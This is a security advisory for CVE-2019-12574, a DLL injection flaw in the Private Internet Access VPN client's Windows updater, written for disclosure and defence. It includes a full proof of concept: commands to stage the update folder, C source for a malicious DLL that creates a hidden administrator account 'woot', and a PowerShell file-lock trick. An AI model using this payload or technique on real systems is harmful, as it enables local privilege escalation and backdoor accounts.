ASA-2019-00380 – London Trust Media Private Internet Access: DLL injection vulnerability during the update process


Allele Security Alert

ASA-2019-00380

Identifier(s)

ASA-2019-00380, CVE-2019-12574

Title

DLL injection vulnerability during the update process

Vendor(s)

London Trust Media

Product(s)

Private Internet Access (PIA) VPN Client

Affected version(s)

Private Internet Access (PIA) VPN Client for Windows version v1.0

Fixed version(s)

Private Internet Access (PIA) VPN Client for Windows version v1.0.1

Proof of concept

Yes

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v1.0 for Windows could allow an authenticated, local attacker to run arbitrary code with elevated privileges.

The PIA Desktop client is vulnerable to a DLL injection vulnerability during the update process. The updater loads several DLLs from a folder that authenticated users have write access to. A low privileged user can leverage this vulnerability to execute arbitrary code as an administrator.

Technical details

When an update is available a low privilege user is notified in the client and is presented with the option to download it. When clicked, the PIA client sends a command to the PIA service to download the update. The update is staged in “C:\ProgramData\Private Internet Access\update\”. This directory and all files within it are removed prior to storing the update file.

A low privileged user can create a file in the update directory and set a lock on it which prevents the PIA service from deleting it during the download process. This can be leveraged to stage a malicious DLL that the update process will load. The next time an administrator opens the PIA client a new option to install the latest version will be available. When clicked, the updater will install the update and silently execute arbitrary code as the administrator. This PoC will demonstrate that a new administrator named “woot” will be added during the update process.

The following DLLs are loaded by the pia-windows-x64-1.0-02176.exe

C:\ProgramData\Private Internet Access\update\spinf.dll
C:\ProgramData\Private Internet Access\update\USERENV.dll
C:\ProgramData\Private Internet Access\update\newdev.dll
C:\ProgramData\Private Internet Access\update\DEVRTL.dll
C:\ProgramData\Private Internet Access\update\DEVOBJ.dll
C:\ProgramData\Private Internet Access\update\drvstore.dll
C:\ProgramData\Private Internet Access\update\PROPSYS.dll
C:\ProgramData\Private Internet Access\update\LINKINFO.dll
C:\ProgramData\Private Internet Access\update\ntshrui.dll
C:\ProgramData\Private Internet Access\update\SspiCli.dll
C:\ProgramData\Private Internet Access\update\srvcli.dll
C:\ProgramData\Private Internet Access\update\cscapi.dll
C:\ProgramData\Private Internet Access\update\CLDAPI.dll
C:\ProgramData\Private Internet Access\update\FLTLIB.DLL
C:\ProgramData\Private Internet Access\update\apphelp.dll
C:\ProgramData\Private Internet Access\update\netutils.dll

Permissions of “c:\ProgramData\Private Internet Access” showing that BUILTIN\Users has write access.

c:\ProgramData\Private Internet Access NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES

Permissions of “c:\ProgramData\Private Internet Access\update” showing that the test1 user has full access(see step 2).

c:\ProgramData\Private Internet Access\update NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CHAOS\test1:(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES

1) Open a cmd shell and change to the “C:\ProgramData\Private Internet Access” folder.

cd "c:\ProgramData\Private Internet Access"

2) Create the update folder and change to it.

mkdir update
cd update

3) Create a malicious library to create an administrator account named woot when loaded.

/* Cross Compile with
x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
*/

#include <windows.h>

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved )
{
    switch( fdwReason )
    {
        case DLL_PROCESS_ATTACH:
            system("cmd /c net user woot insertpasswordhere /add");
            system("cmd /c net localgroup administrators woot /add");
            break;

        case DLL_THREAD_ATTACH:
            // Do thread-specific initialization.
            break;

        case DLL_THREAD_DETACH:
            // Do thread-specific cleanup.
            break;

        case DLL_PROCESS_DETACH:
            // Perform any necessary cleanup.
            break;
    }
    return TRUE; // Successful DLL_PROCESS_ATTACH.
}

4) Copy the malicious DLL into the update folder. For this PoC we will use spinf.dll as the target.

copy woot.dll spinf.dll

5) Execute powershell and set a lock on the spinf.dll file to prevent the library from being deleted. The author appreciates @poshkatz for teaching him how to easily lock files with PowerShell.

$f = [System.IO.File]::Open("spinf.dll",[System.IO.FileMode]::Open [System.IO.FileAccess]::Read,
[System.IO.FileShare]::Read)

6) Verify the lock by typing $f. The output should look like this.

CanRead : True
CanWrite : False
CanSeek : True
IsAsync : False
Length : 287283
Name : c:\ProgramData\Private Internet Access\update\spinf.dll
Position : 0
Handle : 880
SafeFileHandle : Microsoft.Win32.SafeHandles.SafeFileHandle
CanTimeout : False
ReadTimeout :
WriteTimeout :

7) Open the PIA client. An update will be available. Click Download v1.0.0.

8) Now that the update is staged, exit all windows and logout.

9) Login as an Administrator.

10) Open the PIA client and click the update icon in the upper right and then click the “Install v1.0.0” option. The update will install normally.

11) At this point the “woot” administrator account will exist. Open a cmd shell and verify.

net user woot

Credits

Rich Mirch

Reference(s)

PIA Windows Privilege Escalation: DLL Injection
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12574.txt

CVE-2019-12574
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12574

CVE-2019-12574
https://nvd.nist.gov/vuln/detail/CVE-2019-12574

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: June 25, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.